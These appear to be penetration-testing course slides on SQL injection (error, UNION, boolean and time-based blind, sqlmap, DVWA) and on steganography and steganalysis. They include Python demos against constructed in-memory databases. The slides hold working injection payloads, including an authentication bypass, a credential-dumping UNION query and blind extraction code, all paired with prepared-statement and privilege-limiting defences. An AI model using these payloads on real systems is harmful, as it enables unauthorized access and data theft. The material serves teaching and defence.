SQL Injection and Steganography in Pen Testing
• SQL injection is a code injection technique,
used to attack data-driven applications, in
which malicious SQL statements are
inserted into an entry field for execution
• This is a method to attack web applications
that have a data repository.
• The attacker would send a specially
crafted SQL statement that is designed to
cause some malicious action.
• Determining database schema
• Extracting data
• Adding or modifying data
• Bypassing authentication
• On August 17, 2009, the United States Justice
Department charged an American citizen
Albert Gonzalez and two Russians with the
theft of 130 million credit card numbers using
an SQL injection attack.
• In 2008 a wave of automated attacks began exploiting
SQL injection flaws in ASP applications running on
Microsoft's IIS web server and SQL Server (the flaws were in
the applications, not in IIS or SQL Server themselves). Over
500,000 sites were compromised.
• The ability to inject SQL commands into the
database engine through an existing
application
• SQL injection is the use of publicly available
fields to gain entry to your database.
• This is done by entering SQL commands into
your form fields instead of the expected data.
• Improperly coded forms will allow a hacker to
use them as an entry point to your database
1. App sends form to user.
2. Attacker submits form with SQL
exploit data.
3. Application builds string with
exploit data.
4. Application sends SQL query to
DB.
5. DB executes query, including
exploit, sends data back to
application.
6. Application returns data to user.
[Diagram: Attacker / User → Firewall → Web Server → DB Server; a login form with fields User and Pass, where Pass is set to ' or 1=1--]
Unauthorized Access Attempt:
password = ' or 1=1 --
SQL statement becomes:
select count(*) from users where username = 'user'
and password = '' or 1=1 --
Because AND binds tighter than OR, the database evaluates this as
(username = 'user' and password = '') or 1=1. The second branch is
always true, so count(*) is non-zero and access is granted; the
trailing -- comments out the closing quote the application appends.
1. Leakage of sensitive
information.
2. Reputation decline.
3. Modification of sensitive
information.
4. Loss of control of db server.
5. Data loss.
6. Denial of service.
1. First order attacks
• The attacker can simply enter a malicious
string and cause the modified code to be
executed immediately
2. Second order attacks
• The attacker stores the malicious string in persistent
storage (such as a table row), where it is later treated as
trusted data; the injection fires when another part of the
application reads it back and builds a query from it.
3. Lateral Injection
• The attacker never supplies a string at all: in Oracle, a
number or date parameter is implicitly converted with TO_CHAR()
according to the session's NLS settings (for example
NLS_DATE_FORMAT), so an attacker who can change those settings
can make the converted value carry SQL into a query that was
built only from "safe" numeric or date input.
First-order injection vectors
• Injection through user input (form fields, URL parameters)
• Injection through cookies
• Injection through server variables (HTTP headers such as
User-Agent or Referer that the application logs or stores)
SQL Injection Types
1. Error-based SQL Injection
2. UNION-based SQL Injection
3. Blind SQL Injection (no data or error is shown directly)
4. Boolean-based SQL Injection (blind: only the page content changes)
5. Time-based SQL Injection (blind: only the response time changes)
Error-based SQL Injection
• One of the most common types of SQL Injection
vulnerabilities, it is also quite easy to determine.
• It relies on feeding unexpected commands or
invalid input, typically through a user interface,
to cause the database server to reply with an
error that may contain details about the target
structure, version, operating system, and even
to return full query results.
Error-based SQL Injection
• Error-based SQL injection is an in-band technique: the attacker
uses the database's own error output to learn about, and
extract, its data.
• The injected input forces the database to raise an error, and
the error message reveals details of the database's structure.
• In-band means the same channel (the HTTP request and
response) is used both to launch the attack and to retrieve
the data.
• The underlying flaw is that the application sends the raw
database error back to the client instead of, or along with,
the intended data.
• Chained carefully, such errors let the attacker map out the
entire database structure.
Example: Adding SQL Syntax to User Input
•In error-based SQL injection, the attacker tries to
insert a malicious query with the goal of receiving an
error message that provides sensitive information
about the database.
•The attacker might try any type of SQL command in
an input field parameter—such as a
single quote, double quote, or SQL operators like AND,
OR, NOT.
Example: Adding SQL Syntax to User Input
This example shows a URL that accepts a parameter from
the user, in this case the required item:
https://example.com/index.php?item=123
The attacker can try adding a single quote at the end of
the parameter value:
https://example.com/index.php?item=123'
If the database returns an error like this, the probe has
confirmed that the parameter is injectable:
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server
version for the right syntax to use near ''VALUE''.
Error-based SQL Injection
This error message provides the attacker with:
Information about the database used—MySQL
The exact syntax that caused the error—single quote
Where the syntax error occurred in the query—after the
parameter value
For an experienced attacker, this is enough to see that the
parameter is concatenated into the query unescaped, and to
plan further injection attacks that can do real damage.
The probing is easy to automate: a script can send many SQL
syntax variants in the parameter and grep the responses for
database error strings to see which ones break the query.
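The probing loop described above, as an added example that is not part of the slides or of any tool named on them: a small Python fingerprinter that appends quote-breaking probes to a parameter, greps each response for the characteristic error text of common database engines, and reports which probes broke the query. The target is a constructed stand-in for the vulnerable index.php page, backed by an in-memory SQLite database so it runs offline; the `send` callable, the `items` table and the probe list are assumptions of the example.

```python
import re
import sqlite3

# Characteristic error text per DBMS, taken from the engines' own messages.
ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax",
              r"check the manual that corresponds to your (MySQL|MariaDB) server version"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string",
                             r"Incorrect syntax near"],
    "Oracle": [r"ORA-\d{5}", r"quoted string not properly terminated"],
    "PostgreSQL": [r"unterminated quoted string", r"syntax error at or near"],
    "SQLite": [r"unrecognized token", r'near ".*": syntax error', r"SQLITE_"],
}

# Probes appended to the original parameter value: quote breakers that error
# out, and logic probes that change the result, if the input is concatenated
# into a query.
PROBES = ["'", '"', "')", "' OR '1'='1", "' AND '1'='2"]


def classify_error(body):
    """Return the DBMS whose error signature appears in the response, else None."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        for pattern in patterns:
            if re.search(pattern, body):
                return dbms
    return None


def probe_parameter(send, base_value):
    """Try every probe on one parameter; return (probe, dbms) for each one that leaks an error.

    `send(value)` performs the request with the parameter set to `value` and
    returns the response body as a string.
    """
    findings = []
    for probe in PROBES:
        dbms = classify_error(send(base_value + probe))
        if dbms is not None:
            findings.append((probe, dbms))
    return findings


def make_target(vulnerable):
    """Constructed stand-in for index.php?item=... backed by in-memory SQLite."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items(id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO items(id, name) VALUES (123, 'widget')")

    def send(item):
        try:
            if vulnerable:  # string concatenation, as in the slide's example
                rows = conn.execute(f"SELECT name FROM items WHERE id = '{item}'").fetchall()
            else:           # bound parameter: the value is never parsed as SQL
                rows = conn.execute("SELECT name FROM items WHERE id = ?", (item,)).fetchall()
        except sqlite3.Error as exc:
            return f"Warning: {exc}"  # the raw database error leaks into the page
        return "items: " + ", ".join(name for (name,) in rows)
    return send


if __name__ == "__main__":
    print(classify_error("You have an error in your SQL syntax; check the manual ..."))
    print("vulnerable:", probe_parameter(make_target(vulnerable=True), "123"))
    print("fixed:     ", probe_parameter(make_target(vulnerable=False), "123"))
```

Only probes that produce a database error are reported; the `' OR '1'='1` probe does not error on the vulnerable target but changes the result set, so a real scanner also diffs the response content, which is the boolean-based technique covered later.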
Union-based SQL Injection
• When an application is vulnerable to SQL injection
and the results of the query are returned within the
application's responses, the UNION keyword can be
used to retrieve data from other tables within the
database.
• This results in an SQL injection UNION attack.
Union example
• Union keyword helps to execute one or more
additional “Select” queries and append the results
to the original query.
• E.g., select a, b from table1 union select c, d from
table2
• The query returns a single result set with two columns,
containing the values from columns a and b of table1
followed by columns c and d of table2 (UNION also removes
duplicate rows; UNION ALL keeps them).
• Conditions to be met for a union query to work:
• Individual queries must return the same number of columns
• Data types in each column must be compatible between the individual
queries.
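A worked UNION attack against a constructed vulnerable search function, added here as an example that is not part of the slides: it first finds how many columns the original query returns by appending UNION SELECT NULL, NULL, ... until the database stops complaining (the two conditions above), then places username and password into those columns. The `products`/`users` schema and the `search` function are assumptions of the example, backed by an in-memory SQLite database.

```python
import sqlite3


def make_search():
    """Constructed vulnerable product search: the query text is built by concatenation."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(name TEXT, price TEXT, category TEXT);
        INSERT INTO products VALUES ('Widget', '9.99', 'tools'),
                                    ('Gadget', '19.99', 'tools'),
                                    ('Mug', '4.50', 'kitchen');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t!'), ('alice', 'hunter2');
    """)

    def search(category):
        sql = f"SELECT name, price FROM products WHERE category = '{category}'"
        try:
            return conn.execute(sql).fetchall()   # rows are rendered in the page
        except sqlite3.Error:
            return None                           # the app shows a generic error page
    return search


def find_column_count(search, max_cols=10):
    """Append UNION SELECT NULL[, NULL...] until the column counts match (no error)."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        if search(payload) is not None:
            return n
    return None


def dump_users(search, ncols):
    """Pull username/password through the first two visible columns.

    NULL is type-compatible with every column, so it pads the remaining
    positions; stricter engines (MySQL, MSSQL) may need the data columns
    cast to the original columns' types.
    """
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "' UNION SELECT " + ", ".join(cols) + " FROM users--"
    # category = '' matches no product, so every returned row comes from users
    rows = search(payload) or []
    return sorted((row[0], row[1]) for row in rows)


if __name__ == "__main__":
    search = make_search()
    n = find_column_count(search)
    print("columns:", n)
    print("users:", dump_users(search, n))
```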
Time-based SQL Injection
• This type of blind SQL Injection relies on waiting
for a specific period before a vulnerable
application responds to an attacker’s queries
tailored with a time delay value.
• The success of the attack is based on the time
taken by the application to deliver the response.
Time-based SQL Injection
1' AND sleep(10)-- -
(MySQL syntax; the space after -- is required for MySQL to treat
the rest of the line as a comment.)
If the response now takes about 10 seconds longer than normal,
the injected sleep() was executed and the parameter is injectable.
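The extraction algorithm behind both boolean-based and time-based blind injection, as an added example that is not part of the slides: each oracle query answers one yes/no question about the data, and a binary search over the length and then over each character's code recovers a string one bit at a time. The vulnerable `page` function and its `users` table are constructed for the demo; SQLite has no sleep function of its own, so a `sleep()` standing in for MySQL's SLEEP() is registered from Python.

```python
import sqlite3
import time


def make_page():
    """Constructed vulnerable user-lookup page backed by in-memory SQLite."""
    conn = sqlite3.connect(":memory:")
    # Stand-in for MySQL's SLEEP(): SQLite has none, so Python's time.sleep is registered.
    conn.create_function("sleep", 1, time.sleep)
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Pa55w0rd'), ('alice', 'hunter2');
    """)

    def page(username):
        sql = f"SELECT 1 FROM users WHERE username = '{username}'"
        try:
            found = conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            found = False
        return "Welcome back" if found else "No such user"
    return page


def boolean_oracle(page):
    """True iff the injected condition is true: the page content differs."""
    return lambda cond: "Welcome back" in page(f"admin' AND ({cond})--")


def time_oracle(page, delay=0.05):
    """True iff the injected condition is true: the response is delayed.

    Only the CASE branch that is taken gets evaluated, so sleep() runs when
    the condition holds. The CASE itself yields NULL or 0, so no row is ever
    returned; the timing is the only signal, as in time-based injection.
    """
    def ask(cond):
        start = time.perf_counter()
        page(f"admin' AND (CASE WHEN ({cond}) THEN sleep({delay}) ELSE 0 END)--")
        return time.perf_counter() - start >= delay / 2
    return ask


def extract(oracle, subquery, max_len=64):
    """Recover the string produced by `subquery`, one yes/no question per step."""
    lo, hi = 0, max_len                    # binary search for the length first
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    result = ""
    for i in range(1, length + 1):         # then each character, 7 questions each
        lo, hi = 32, 126                   # printable ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


ADMIN_PASSWORD = "SELECT password FROM users WHERE username = 'admin'"

if __name__ == "__main__":
    page = make_page()
    print("boolean-based:", extract(boolean_oracle(page), ADMIN_PASSWORD))
    print("time-based:   ", extract(time_oracle(page), "'ok'"))
```

Both oracles feed the same `extract` routine; the only difference is how the yes/no answer is read. The time-based oracle costs one delay per "yes", which is why time-based extraction is much slower and why tools such as sqlmap prefer boolean or error-based channels when they are available.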
sqlmap
• sqlmap is an open source penetration testing tool that
automates the process of detecting and exploiting SQL
injection flaws and taking over database servers.
• It is used to test whether a website is vulnerable to SQL
injection.
• Powerful detection engine.
• Many niche features useful to the penetration tester.
• A broad range of switches, from database fingerprinting and
fetching data from the database to accessing the underlying
file system and executing commands on the operating system.
sqlmap Features
• Full support for these database management systems:
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• Full support for six SQL injection techniques:
•boolean-based blind,
•time-based blind,
•error-based,
•UNION query,
•stacked queries and
•out-of-band.
• Support to
• Directly connect to the database without passing via a SQL
injection; provides DBMS credentials, IP address, port and
database name.
• Dump database tables entirely, a range of entries or specific
columns as per user’s choice.
• Search for specific database names, specific tables across all
databases or specific columns across all databases’ tables.
• Download and upload any file from the database server
underlying file system when the database software is
MySQL, PostgreSQL or Microsoft SQL Server.
• Support to:
• Execute arbitrary commands and retrieve their standard
output on the database server underlying operating system
when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.
• Establish an out-of-band stateful TCP connection between
the attacker machine and the database server underlying
operating system. This channel can be an interactive
command prompt, a Meterpreter session or a graphical
user interface (VNC) session as per user’s choice.
• Database process user privilege escalation via Metasploit’s
Meterpreter getsystem command.
Installing sqlmap
sqlmap comes pre-installed with Kali Linux, which is
the preferred choice of most penetration testers.
On other Debian-based Linux systems you can install it with
sudo apt-get install sqlmap
Using SQLMAP to test a website
for SQL Injection vulnerability:
Step 1: List information about the existing
databases
Step 2: List information about Tables present in a
particular Database
Step 3: List information about the columns of a
particular table
Step 4: Dump the data from the columns
Reasons for SQL Injection vulnerability
• Websites require constant access to the database, so the
database cannot simply be walled off from the web tier.
• Network firewalls provide little or no defense against SQL
injection: the attack travels inside legitimate HTTP requests
to a port that must be open.
• Antivirus programs are equally ineffective, since no malware
is involved; the payload is ordinary text in a form field.
How to Prevent SQL Injections
(SQLi) – Generic Tips
Step 1: Train and maintain awareness
Step 2: Do not trust any user input
Step 3: Use whitelists, not blacklists
Step 4: Adopt the latest technologies
Step 5: Employ verified mechanisms
Step 6: Scan regularly
1. Comprehensive input validation
• Web sites must validate all user input against what the
field is expected to contain.
• For example, e-mail addresses should be checked to allow
only the characters allowed in an e-mail address.
• Validation reduces the attack surface but is not a complete
defense on its own: some fields (names such as O'Brien, free
text) legitimately contain quote characters.
2. Use a web application firewall
• A popular example is the free, open source
module ModSecurity.
• ModSecurity provides a sophisticated and
ever-evolving set of rules to filter potentially
dangerous web requests; its SQL injection rules can catch
most attempts to sneak SQL through web channels, but a WAF
is a second layer, not a fix for the vulnerable code.
3. Limit database privileges by context
• Create multiple database user accounts with the minimum
levels of privilege for their usage environment.
• For example, the code behind a login page should query the
database using an account limited to the relevant
credentials table.
• This way, a breach through this channel cannot be leveraged
to compromise the entire database.
4. Avoid constructing SQL queries with user
input
• Even data sanitization routines can be flawed.
• Binding user input as parameters of prepared
statements is much safer than building the query string,
because bound data can never be parsed as SQL.
• Stored procedures help only if they do not themselves build
dynamic SQL from their arguments.
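The ' or 1=1 -- bypass from the login example earlier in the deck, beside the prepared-statement fix recommended here, as an added example that is not part of the slides. It uses an in-memory SQLite database; the `users` table, the hypothetical `login_*` functions and the plaintext passwords (kept only to mirror the slide's query; real systems compare password hashes) are assumptions of the example.

```python
import sqlite3


def make_db():
    """Constructed users table matching the slide's query (plaintext only for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user", "correct horse"), ("admin", "hunter2")])
    return conn


def build_query_vulnerable(username, password):
    """The slide's pattern: user input is glued into the SQL text."""
    return ("select count(*) from users where username = '" + username +
            "' and password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Executes whatever the concatenated string turned into."""
    sql = build_query_vulnerable(username, password)
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Prepared statement with bound parameters: the input is sent as data,
    so a quote or -- inside it can never change the query's structure."""
    sql = "select count(*) from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 --"
    print(build_query_vulnerable("user", payload))
    print("vulnerable:", login_vulnerable(conn, "user", payload))   # bypassed
    print("safe:      ", login_safe(conn, "user", payload))         # rejected
    # Commenting out the password check lets the attacker pick the account:
    print("vulnerable, specific account:", login_vulnerable(conn, "admin'--", "anything"))
```

The `admin'--` username shows why the authentication-bypass impact is worse than "some user gets in": with the password predicate commented out, the attacker chooses which account to become.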
SQL Injection Tools
• BSQL Hacker
• SQLmap
• SQLninja
• Safe3 SQL Injector
• SQLSus
• Mole
• Havij
• SQL injection is a technique for exploiting
applications that use relational databases as
their back end.
• Applications compose SQL statements and
send them to the database.
• SQL injection exploits the fact that many of these
applications concatenate the fixed part of the SQL
statement with user-supplied data that forms
WHERE predicates or additional sub-queries.
• The technique is based on malformed user-supplied
data that transforms the innocent SQL call into a
malicious one.
• It can cause unauthorized access, deletion of data, or theft
of information.
• Any database engine can be the target: the vulnerability is
not in the database but in the application layer, at the
point where the application builds the query it sends over
its database connection.
Damn Vulnerable Web App (DVWA)
• Damn Vulnerable Web App (DVWA) is a PHP/MySQL
web application that is deliberately vulnerable.
• Its main goal is to be an aid for security professionals
to test their skills and tools in a legal environment.
Attacks in DVWA
1. Brute Force
2. Command Execution
3. CSRF
4. File Inclusion
5. SQL Injection
6. SQL Injection (Blind)
7. File Upload (shell upload)
8. XSS (Reflected)
9. XSS (Stored)
DVWA Security Levels:
• Low: no protection; freedom to exploit all known vulnerabilities
• Medium: entry-level validation and filtering that can still be
bypassed
• High: tight security
Installation
• DVWA is a web application coded in PHP that uses a
MySQL back-end database.
• DVWA needs a web server, PHP and MySQL installed in
order to run.
• The easiest way to install DVWA is to download and install
'XAMPP'.
Steganography
What is Steganography?
• Steganography is the art and science of writing hidden messages
in such a way that no one, apart from the sender and intended
recipient, suspects the existence of the message.
• It is a form of security through obscurity: it hides that a
message exists, but on its own does not protect the content once
the hiding method is known, which is why it is usually combined
with encryption.
• The word steganography is of Greek origin and means "concealed
writing", from steganos meaning "covered or protected" and
graphein meaning "writing".
• "Steganography means hiding one piece of data within another."
Example
Since everyone can read, encoding text
in neutral sentences is doubtfully effective
Reading only the first letter of each word:
Since Everyone Can Read, Encoding Text
In Neutral Sentences Is Doubtfully Effective
reveals the hidden message: "Secret inside"
• "The goal of steganography is to hide messages in such a
way that no one apart from the intended recipient even
knows that a message has been sent."
• This is achieved by concealing the existence of the
information within seemingly harmless carriers, or covers.
• It can be understood from the following figure.
History Of Steganography
• The first recorded uses of steganography can be traced back to 440 BC,
when Herodotus mentions two examples of steganography in his Histories.
• Demaratus sent a warning about a forthcoming attack on Greece by writing it
directly on the wooden backing of a wax tablet before applying its beeswax
surface.
• Wax tablets were in common use then as reusable writing surfaces,
sometimes used for shorthand.
• Ancient Chinese wrote messages on fine silk, which was then crumpled into
a tiny ball and covered in wax. The messenger then swallowed the ball of
wax.
• Special "inks" were important steganographic tools even during the Second
World War.
• During the Second World War a technique was developed to shrink
photographically a page of text into a dot less than one millimeter in
diameter, and then hide this microdot in an apparently innocuous letter.
(The first microdot has been spotted
Physical Techniques
• Hidden messages within wax tablets
• Hidden messages on the messenger's body
• Hidden messages on paper written in secret inks
• Messages written in Morse code on knitting yarn and then
knitted into a piece of clothing worn by a courier
• Messages written on envelopes in the area covered by
postage stamps
Digital Techniques
• Concealing messages within the lowest bits (LSBs) of
noisy images or sound files
• Chaffing and winnowing
• Modifying the echo of a sound file (echo steganography)
• Including data in ignored sections of a file, such as
after the logical end of the carrier file
Combined Crypto-Steganography
[Figure: the secret is first passed through Encryption; the ciphertext is then merged into a cover by Steganography, producing an invisible, innocuous-looking stego-object.]
Basic Steganography Model
[Figure: basic steganography model]
Steganography Terms
• Carrier or Cover File - the original file inside which the
hidden information will be stored.
• Stego-Medium - the resulting medium in which the information
is hidden.
• Embedded or Payload - the information which is to be hidden
or concealed.
• Steganalysis - the process of detecting hidden information
inside a file.
Steganography can be applied to several carrier types:
• Steganography in "TEXT"
• Steganography in "IMAGES"
• Steganography in "AUDIO"
Text Steganography Methods
• Text steganography in markup languages (HTML)
• Specific characters in words (e.g. first letters, as in the
acrostic above)
• Line shifting
• Word shifting
• Open spaces (extra whitespace encodes bits)
• Semantic methods (synonym substitution)
• Character encoding
Examples of Text Steganography
Image Steganography
• Using image files as hosts for steganographic
messages takes advantage of the limited
capabilities of the human visual system: small changes
to pixel values are not perceptible.
Audio Steganography
• Embedding secret messages into digital
sound is known as audio steganography.
• To embed data secretly in a digital audio file, a few
techniques have been introduced:
• LSB coding
• Phase coding
• Parity coding
• Spread spectrum
Steganalysis
• Steganalysis is the art and science of detecting a
secret communication.
• Hiding a message will most likely leave
detectable traces in the cover medium.
• The information hiding process changes the
statistical properties of the cover, which is what a
steganalyst attempts to detect.
• The process of attempting to detect such statistical
traces is called statistical steganalysis.
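LSB embedding (the "lowest bits of noisy images or sound files" technique from the digital-techniques list, and the LSB coding listed for audio) together with the statistical steganalysis described above, as an added example that is not part of the slides. The cover is a constructed 64x64 8-bit grayscale image held as raw bytes, so no image library is needed; the 32-bit length header, the chi-square pairs-of-values statistic and the biased sample generator are assumptions of the example.

```python
import random


def embed_lsb(cover, payload):
    """Write payload bits into the least-significant bit of successive cover samples.

    A 32-bit big-endian length header comes first so the extractor knows
    where the payload ends. Each sample changes by at most 1.
    """
    header = len(payload).to_bytes(4, "big")
    bits = "".join(f"{b:08b}" for b in header + payload)
    if len(bits) > len(cover):
        raise ValueError("payload too large for this cover")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | int(bit)
    return bytes(stego)


def extract_lsb(stego):
    """Read the length header, then that many payload bytes, from the LSBs."""
    def read_bytes(first_bit, nbytes):
        if nbytes == 0:
            return b""
        bits = "".join(str(stego[i] & 1) for i in range(first_bit, first_bit + 8 * nbytes))
        return int(bits, 2).to_bytes(nbytes, "big")
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def chi_square_lsb(samples):
    """Pairs-of-values (chi-square) steganalysis.

    LSB embedding only moves samples between 2k and 2k+1, so embedding a
    random payload drives the counts of each such pair towards equality.
    A natural cover rarely has that symmetry: a score close to the number
    of pairs (128) suggests LSB embedding, a much higher score does not.
    """
    counts = [0] * 256
    for s in samples:
        counts[s] += 1
    score = 0.0
    for k in range(128):
        even, odd = counts[2 * k], counts[2 * k + 1]
        expected = (even + odd) / 2
        if expected:
            score += (even - expected) ** 2 / expected + (odd - expected) ** 2 / expected
    return score


def make_cover(n=64 * 64, seed=1):
    """Constructed 8-bit grayscale image with a natural-looking LSB bias:
    about 80% of samples have a cleared LSB (as quantisation might leave)."""
    rng = random.Random(seed)
    return bytes((rng.randrange(256) & 0xFE) if rng.random() < 0.8 else rng.randrange(256)
                 for _ in range(n))


def random_payload(nbytes, seed=7):
    """Constructed payload with uniformly random bits, e.g. encrypted data."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(nbytes))


if __name__ == "__main__":
    cover = make_cover()
    stego = embed_lsb(cover, b"Secret inside")
    print(extract_lsb(stego))
    full = embed_lsb(cover, random_payload((len(cover) - 32) // 8))
    print("chi-square cover:", round(chi_square_lsb(cover)),
          "stego:", round(chi_square_lsb(full)))
```

The short "Secret inside" payload touches only the first 136 samples, so the statistic over the whole image barely moves; a payload that fills the cover flattens every pair and the score collapses towards 128. That is why steganalysts also run the statistic over prefixes or sliding windows of the carrier, where sequentially embedded short messages show up.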
IMPORTANT ASPECTS OF STEGANALYSIS
• Detecting hidden information
• Disabling steganography (destroying the hidden message, for
example by re-encoding or adding noise to the carrier)